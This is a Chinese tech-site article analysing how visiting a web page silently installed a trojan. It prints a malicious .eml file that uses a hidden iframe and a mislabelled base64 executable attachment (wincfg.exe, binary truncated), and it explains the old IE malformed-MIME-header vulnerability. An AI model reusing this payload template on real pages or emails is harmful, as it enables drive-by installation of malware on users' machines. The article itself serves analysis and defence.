科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网网络频道浏览网页也会中木马-注册表全攻略(2)

浏览网页也会中木马-注册表全攻略(2)

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

在半年前就有人使用这种技术来使人中招了!最近听说有人在浏览某个网站时中招,因此去那里看了看,在网页打开的过程中,鼠标奇怪的变成沙漏形状,看来的确是有程序在运行。
  • 评论
  • 分享微博
  • 分享邮件

  注意到其中的“wincfg.eml”了吗?大家都知道eml为邮件格式,网页中要eml文件干什么呢?非常可疑!再次浏览该网页,再看看任务管理器,wincfg.exe进程又回来了,原来问题就在这个文件上!既然问题在这文件上,当然想办法搞到这个文件看看了。用蚂蚁把文件下载下来,鼠标刚点上去,wincfg.exe又被执行了,真是阴魂不散啊!

  打开a.eml,发现其内容如下:

  From: "xxx" To: "xxx" Subject: xxxx

  Date: Tue, 7 Apr 2001 15:16:57 +800

  MIME-Version: 1.0

  Content-Type: multipart/related;

  type="multipart/alternative";

  boundary="1"

  X-Priority: 3

  X-MSMail-Priority: Normal

  X-Unsent: 1

  --1

  Content-Type: multipart/alternative;

  boundary="2"

  --2

  Content-Type: text/html;

  charset="gb2312"

  Content-Transfer-Encoding: quoted-printable

  HTML>

  HEAD>

  /HEAD>

  BODY bgColor=3D#ffffff>

  iframe src=3Dcid:THE-CID height=3D0 width=3D0>

  /BODY>

  --2--

  --1

  Content-Type: audio/x-wav;

  name="wincfg.exe"

  Content-Transfer-Encoding: base64

  Content-ID:

  TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4

  gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAIh3BDsAAAAAAAAAAOAADwELAQQUAC

  AAAAAQAAAAkAAAIL0AAACgAAAAwAAAAABAAAAQAAAAAgAABAAAAAEAAAAEAAAAAAAAAADQA

  AAAEAAAAAA……(以下删掉一大节)

  --1

  你看到的类似“TVqQAAMAAAAEAAAA//8AAL”这样的字符,就是wincfg.exe经过base64编码的内容。上面这些代码中,关键的是下面这一段:

  Content-Type: audio/x-wav;

  name="wincfg.exe"

  Content-Transfer-Encoding: base64

  Content-ID:

  其中,name="wincfg.exe"这一句定义了文件名称,在此为wincfg.exe。 而这一句:Content-Transfer-Encoding: base64则定义了代码格式为base64。

  从这句Content-ID: 开始才是代码的起步,

  “TVqQAAMAAAAEAAAA//8AAL”等为wincfg.exe文件的BASE64方式编码,这个以BASE64方式编码的文件会反编译成wincfg.exe文件并运行。这就是浏览该网页会中木马的原因!到此我就明白了,其实,所谓的浏览网页会中木马,只是网页制作者利用了微软IE浏览器中存在的漏洞进行攻击的一个案例而已,说白了就是利用了错误的MIME头进行攻击。

  1.MIME简介

  MIME(Multipurpose Internet Mail Extentions),一般译作“多用途的网际邮件扩充协议”。顾名思义,它可以传送多媒体文件,在一封电子邮件中附加各种格式文件一起送出。现在它已经演化成一种指定文件类型(Internet的任何形式的消息:e-mail,usenet新闻和Web)的通用方法。在使用CGI程序时你可能接触过MIME类型,其中有一行叫作Content-type的语句,它用来指明传递的就是MIME类型的文件(如text/html或text/plain)。

  2.错误的MIME头漏洞的发现

  该漏洞是由一个国外安全小组发现的,该小组发现在MIME在处理不正常的MIME类型时存在个问题,攻击者可以创建一个Html格式的E-mail,该E-mail的附件为可执行文件,通过修改MIME头,使IE不正确处理这个MIME所指定的可执行文件附件。

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章